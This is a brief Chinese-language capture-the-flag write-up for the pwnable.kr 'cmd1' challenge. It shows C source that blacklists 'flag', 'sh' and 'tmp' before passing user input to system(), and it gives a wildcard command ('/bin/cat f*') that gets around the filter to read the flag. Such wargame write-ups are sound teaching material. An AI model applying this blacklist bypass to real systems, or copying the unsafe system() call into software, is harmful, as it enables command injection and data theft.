其他分享
首页 > 其他分享> > cmd1

cmd1

作者:互联网

Mommy! what is PATH environment in Linux?

ssh cmd1@pwnable.kr -p2222 (pw:guest)

 

源码如下:

#include <stdio.h>
#include <string.h>

int filter(char* cmd){
        int r=0;
        r += strstr(cmd, "flag")!=0;
        r += strstr(cmd, "sh")!=0;
        r += strstr(cmd, "tmp")!=0;
        return r;
}
int main(int argc, char* argv[], char** envp){
        putenv("PATH=/thankyouverymuch");
        if(filter(argv[1])) return 0;
        system( argv[1] );
        return 0;
}

对于传入进行了过滤,不能出现flag、sh、tmp

因此利用通配符,运行./cmd1 "/bin/cat f*"即可

标签:return,int,cmd,cmd1,argv,char
来源: https://www.cnblogs.com/hktk1643/p/15352416.html